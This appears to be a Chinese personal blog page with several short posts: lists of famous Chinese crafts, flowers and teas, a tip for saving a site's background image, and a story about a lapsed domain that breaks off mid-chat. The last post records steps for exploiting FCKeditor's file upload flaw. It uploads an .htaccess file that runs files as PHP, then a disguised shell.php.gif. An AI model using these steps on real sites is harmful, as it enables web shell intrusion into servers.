你知道,但你不一定全知道。
【四大名绣】苏绣〖苏州〗、湘绣〖湖南〗、蜀绣〖四川〗、广绣〖广东〗
【四大名扇】檀香扇〖江苏〗、火画扇〖广东〗、竹丝扇〖四川〗、绫绢扇〖浙江〗
【四大名花】牡丹〖山东菏泽〗、水仙〖福建漳州〗、菊花〖浙江杭州〗、山茶〖云南昆明〗
【十大名茶】西湖龙井〖浙江杭州西湖区〗、碧螺春〖江苏吴县太湖的洞庭山碧螺峰〗、信阳毛尖〖河南信阳车云山〗、君山银针〖湖南岳阳君山〗、六安瓜片〖安徽六安和金寨两县的齐云山〗、黄山毛峰〖安徽歙县黄山〗、祁门红茶〖安徽祁门县〗、都匀毛尖〖贵州都匀县〗、铁观音〖福建安溪县〗、武夷岩茶〖福建崇安县〗
【扑克人物】
黑桃J:查尔斯一世的侍从,丹麦人霍克拉
红桃J:查尔斯七世的宫廷随从拉海亚
梅花J:亚瑟王的著名骑士兰斯洛特
方块J:查尔斯一世的侍从罗兰
背景图片
上论坛总觉得有些不一样,感觉清爽多了。才发现背景图片换了。想起了这是个落叶的季节。
微凉的风换过盗用的背景图后,发现真的很漂亮,以前的梦幻游乐园似乎真的有些过于,不适合我这种深沉内敛的人。
这盗用背景的方法也给大伙讲讲好了,这还是源于一次看到了好背景可是没有能力去把他保存在本地。
就慢慢开始研究了,不过现在想想那时候也真是啥,直接查查缓存不就成了何必去找图片地址呢?
本来以前也干过这种事情,那时候都是右键查看源代码。ctrl+f 搜索.jpg 不过现在貌似不管用了。
这里我用的是 chrome 浏览器。上目标站,右键-审查元素-resources-Images-一般背景图片名字前面通常带着些bj.jpg
bjimg.jpg等较为明显的名字。OK,如果你还有些小的发现大家可以共同来,学习。
备案信息被挪用
今天在查询seo中,看到PR为0,很好奇强大的谷歌会不会出现失误之内的错误,例如把个未注册的域名pr有PR也说不定。
于是查询了下llfz.net,llfz.net是我在08年左右在万网代理商那儿注册的一个域名,也是我博客的域名,后来觉得域名拼在浏览器不漂亮,所以就没续费。
神奇的看到了,llfz.net的PR为1,于是接着往下看,发现还有备案呢,备案信息都还是我的呢。
难道这个域名被注册了?心里想到。真的打开了站点,亮丽服装。尼玛的刚刚注册这个域名的时候是我名字的拼音来着
岚峰站,预示着个人站点,这下好了,变成了企业的了。并且注册单位还是我。
找到了联系方式,和人联系了下。
岚 12:50:50
你好,我是岚峰
我不得不说明一下,贵站,也就是llfz.net 的备案信息,目前所用为岚峰的个人备案信息。请抽时间修改一下。
亮丽服装设计 12:51:38
?
岚 12:51:55
FCKeditor全部版本上传漏洞
记录下也许哪天还找这个呢!
FCKeditor all versian Arbitrary File Upload Vulnerability
发布时间: 2011
源码地址:http://sourceforge.net/projects/fckeditor/
漏洞作者: pentesters.ir
利用步骤:
1.创建一个htaccess文件:
代码内容:
SetHandler application/x-httpd-php
2.实用编辑器上传htaccess文件.
http://www.badguest.cn/FCKeditor/editor/filemanager/upload/test.html
http://www.badguest.cn/FCKeditor/editor/filemanager/browser/default/connectors/test.html
3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问http://www.badguest.cn/上传目录/shell_php.gif